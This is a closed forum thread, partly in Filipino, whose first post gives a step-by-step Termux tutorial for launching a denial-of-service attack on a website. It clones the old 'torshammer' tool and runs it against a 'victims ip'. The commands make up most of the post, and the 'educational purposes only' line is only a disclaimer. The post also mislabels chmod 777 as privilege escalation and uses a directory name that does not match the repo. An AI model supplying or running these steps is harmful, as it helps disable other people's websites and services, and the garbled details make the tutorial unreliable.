What's new

Closed Dos

Status
Not open for further replies.

PUTANKINNAMALL

Forum Veteran
Elite
Joined
May 12, 2016
Posts
1,649
Reaction
791
Points
696
educational purposes only
how to dos a certain website gamit ang termux
fire up termux

Code:
apt update && apt upgrade

Code:
pkg install git


next the interpreter
Code:
pkg install python

repo

Code:
git clone https://github.com/dotfighter/torshammer


go to directory
Code:
cd hammer

privilege excalation
Code:
chmod 777 hammer.py

run the script
Code:
python hammer.py


config it

Code:
python hammer.py -s "victims ip" -p "default port 80"  -t "default 135"




lastly this tool is wayback 2012 might not work on some website
 
Wow wala akong alam sa ganito, para sa mga programmer heheheheh:)

Sinearch ko lang kay google ang meaning;

DDoS is short for Distributed Denial of Service. DDoS is a type of DOS attack where multiple compromised systems, which are often infected with a Trojan, are used to target a single system causing a Denial of Service (DoS) attack.
 
Status
Not open for further replies.
Back
Top